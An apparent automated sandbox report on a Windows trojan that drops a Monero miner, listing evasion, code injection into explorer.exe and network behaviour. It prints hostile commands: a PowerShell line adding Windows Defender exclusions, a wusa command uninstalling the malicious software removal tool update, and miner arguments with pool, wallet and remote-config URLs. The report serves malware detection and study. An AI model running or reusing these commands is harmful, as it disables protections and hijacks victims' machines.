Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: explorer.exe, 0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: explorer.exe, 0000003B.00000003.1503013343.0000000001A08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SPAINSTEALTH-TARGETSTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXESTEALTH-FULLSCREENALGO
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JMGYGIBWLGBWTXUGYRY6VXWRXKF94HTUAJR8HVICSX.MADRID" --PASS="" --CPU-MAX-THREADS-HINT=50 --CINIT-WINRING="PJJTWOLJKWRI.SYS" --CINIT-REMOTE-CONFIG="HTTPS://PASTEBIN.COM/RAW/VMNMCAJF,HTTPS://RENTRY.CO/Y9CE3ING/RAW" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-VERSION="3.4.0" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=80 --CINIT-ID="PYUAD
Source: explorer.exe, 0000003B.00000003.1503146567.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.3836485970.0000000000F92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE.
Source: explorer.exe, 0000003B.00000003.1477292624.0000000000F02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HTTPS://PASTEBIN.COM/RAW/VMNMCAJF,HTTPS://RENTRY.CO/Y9CE3ING/RAWTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEPYUADPZAQMICYMRM
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXEBUFFER^E
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10343 --USER="44SZFI7TUDQDAZKCMFHCOY8JBZBYBSAKXLDETPAJCCWJVG4FVX5SWJMGYGIBWLGBWTXUGYRY6VXWRXKF94HTUAJR8HVICSX.MADRID" --PASS="" --CPU-MAX-THREADS-HINT=50 --CINIT-WINRING="PJJTWOLJKWRI.SYS" --CINIT-REMOTE-CONFIG="HTTPS://PASTEBIN.COM/RAW/VMNMCAJF,HTTPS://RENTRY.CO/Y9CE3ING/RAW" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-VERSION="3.4.0" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=80 --CINIT-ID="PYUADPZAQMICYMRM"
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10343--USER=44SZFI7TUDQDAZKCMFHCOY8JBZBYBSAKXLDETPAJCCWJVG4FVX5SWJMGYGIBWLGBWTXUGYRY6VXWRXKF94HTUAJR8HVICSX.MADRID--PASS=--CPU-MAX-THREADS-HINT=50--CINIT-WINRING=PJJTWOLJKWRI.SYS--CINIT-REMOTE-CONFIG=HTTPS://PASTEBIN.COM/RAW/VMNMCAJF,HTTPS://RENTRY.CO/Y9CE3ING/RAW--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-VERSION=3.4.0--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=80--CINIT-ID=PYUADPZAQMICYMRM2
Source: explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEA
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXEBUFFERT
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JMGYGIBWLGBWTXUGYRY6VXWRXKF94HTUAJR8HVICSX.MADRID" --PASS="" --CPU-MAX-THREADS-HINT=50 --CINIT-WINRING="PJJTWOLJKWRI.SYS" --CINIT-REMOTE-CONFIG="HTTPS://PASTEBIN.COM/RAW/VMNMCAJF,HTTPS://RENTRY.CO/Y9CE3ING/RAW" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-VERSION="3.4.0" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=80 --CINIT-ID="PYUAD
Source: explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE_
Source: explorer.exe, 0000003B.00000003.1503013343.0000000001A08000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.1503146567.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.3836485970.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.1477292624.0000000000F02000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.3837102907.00000000019D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.1503060227.00000000019FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXET

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6079	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3726	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5897	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3755	Jump to behavior

Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe

Dropped PE file which has not been started: C:\Windows\Temp\pjjtwoljkwri.sys

Jump to dropped file

Source: C:\Windows\System32\conhost.exe

API coverage: 0.8 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep count: 6079 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812	Thread sleep count: 3726 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1120	Thread sleep count: 5897 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1452	Thread sleep count: 3755 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2228	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7764	Thread sleep count: 75 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7764	Thread sleep count: 42 > 30	Jump to behavior

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000003B.00000002.3836485970.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWd

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Code function: 57_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,

57_2_0000000140001160

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 54.37.137.114 10343	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.20.4.235 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 51.89.23.91 10343	Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	NtProtectVirtualMemory: Direct from: 0x7FF776EFDEBE	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	NtProtectVirtualMemory: Direct from: 0x7FF7773E78B2	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	NtProtectVirtualMemory: Direct from: 0x7FF615891597	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	NtProtectVirtualMemory: Direct from: 0x7FF776EDAA36	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	NtProtectVirtualMemory: Direct from: 0x7FF615875006	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	NtProtectVirtualMemory: Direct from: 0x7FF61588A762	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	NtProtectVirtualMemory: Direct from: 0x7FF77733B72D	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	NtProtectVirtualMemory: Direct from: 0x7FF615CD0F4D	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	NtProtectVirtualMemory: Direct from: 0x7FF615D733BA	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	NtProtectVirtualMemory: Direct from: 0x7FF615D678B2	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	NtProtectVirtualMemory: Direct from: 0x7FF777350F4D	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	NtProtectVirtualMemory: Direct from: 0x7FF61587DEBE	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	NtProtectVirtualMemory: Direct from: 0x7FF776F1F01B	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	NtProtectVirtualMemory: Direct from: 0x7FF7773229CB	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	NtProtectVirtualMemory: Direct from: 0x7FF61585AA36	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	NtProtectVirtualMemory: Direct from: 0x7FF776F0A762	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	NtProtectVirtualMemory: Direct from: 0x7FF776F1BE63	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	NtProtectVirtualMemory: Direct from: 0x7FF615860ED4	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	NtProtectVirtualMemory: Direct from: 0x7FF615CC2AE7	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe	NtProtectVirtualMemory: Direct from: 0x7FF776EF5006	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	NtProtectVirtualMemory: Direct from: 0x7FF615884767	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Memory written: PID: 7744 base: 140000000 value: 4D	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Memory written: PID: 7744 base: 140001000 value: NU	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Memory written: PID: 7744 base: 140674000 value: DF	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Memory written: PID: 7744 base: 140847000 value: 00	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Memory written: PID: 7744 base: D85010 value: 00	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Thread register set: target process: 4456			Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Thread register set: target process: 7744			Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\ProgramData\GoogleUP\Chrome\Updater.exe	Process created: C:\Windows\explorer.exe explorer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
